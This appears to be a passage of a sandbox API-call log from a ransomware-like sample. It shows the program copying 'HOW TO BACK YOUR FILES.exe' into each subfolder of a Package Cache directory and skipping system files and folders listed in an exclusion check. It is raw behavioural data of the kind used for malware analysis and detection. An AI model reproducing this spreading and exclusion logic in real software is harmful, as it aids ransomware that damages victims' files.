dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0073.065] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0073.065] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0073.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0073.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0073.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0073.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0073.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0073.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0073.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0073.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0073.065] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0073.067] CloseHandle (hObject=0x120) returned 1 [0073.067] CloseHandle (hObject=0x15c) returned 1 [0073.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0073.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0073.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0073.068] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fed00, ftCreationTime.dwHighDateTime=0x1d28825, ftLastAccessTime.dwLowDateTime=0x36fed00, ftLastAccessTime.dwHighDateTime=0x1d28825, ftLastWriteTime.dwLowDateTime=0x36fed00, ftLastWriteTime.dwHighDateTime=0x1d28825, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0073.068] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0073.068] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25a8 [0073.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0073.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2d40 | out: hHeap=0x2b0000) returned 1 [0073.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0073.068] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 82 [0073.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0073.068] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.068] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0073.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.069] GetLastError () returned 0x20 [0073.069] Sleep (dwMilliseconds=0xc8) [0073.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.267] GetLastError () returned 0x20 [0073.267] Sleep (dwMilliseconds=0xc8) [0073.472] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.472] GetLastError () returned 0x20 [0073.472] Sleep (dwMilliseconds=0xc8) [0073.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0073.673] GetLastError () returned 0x0 [0073.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0073.673] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0073.673] CloseHandle (hObject=0x15c) returned 1 [0073.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0073.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.673] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bcd63c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bcd63c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0073.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.674] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.674] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bcd63c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bcd63c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.674] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.674] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0073.674] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.674] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.674] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bcd63c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bcd63c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0073.674] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0073.674] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0073.674] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0073.675] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0073.675] lstrlenW (lpString="packages") returned 8 [0073.675] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned 84 [0073.675] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0073.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0073.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x31efc8 [0073.675] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2d2608 [0073.675] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0073.675] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0073.675] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0073.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0073.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0073.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0073.675] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 91 [0073.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0073.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.675] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0073.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0073.676] GetLastError () returned 0x0 [0073.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0073.676] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0073.676] CloseHandle (hObject=0x15c) returned 1 [0073.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0073.676] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.676] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0073.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.676] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.676] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.676] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.676] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0073.676] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.676] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.676] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bd22680, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bd22680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0073.676] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0073.676] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c126ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c126ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="aoldtz.exe") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="bootmgr") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="temp") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="pagefile.sys") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="boot") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ids.txt") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="perflogs") returned 1 [0073.677] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="MSBuild") returned 1 [0073.677] lstrlenW (lpString="vcRuntimeMinimum_amd64") returned 22 [0073.677] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned 93 [0073.677] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeMinimum_amd64" | out: lpString1="vcRuntimeMinimum_amd64") returned="vcRuntimeMinimum_amd64" [0073.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0073.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe6) returned 0x2c8eb8 [0073.677] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2d2608 [0073.677] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c126ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c126ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0073.677] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0073.677] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0073.677] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0073.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0073.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0073.677] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 114 [0073.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0073.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0073.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0073.678] GetLastError () returned 0x0 [0073.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0073.678] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0073.678] CloseHandle (hObject=0x15c) returned 1 [0073.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0073.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.678] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c126ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c126ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0073.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.679] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0073.679] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c126ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c126ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.679] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.679] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0073.679] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0073.679] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0073.679] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x969a2800, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x969a2800, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x969a2800, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0073.679] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0073.679] lstrcmpiW (lpString1="cab1.cab", 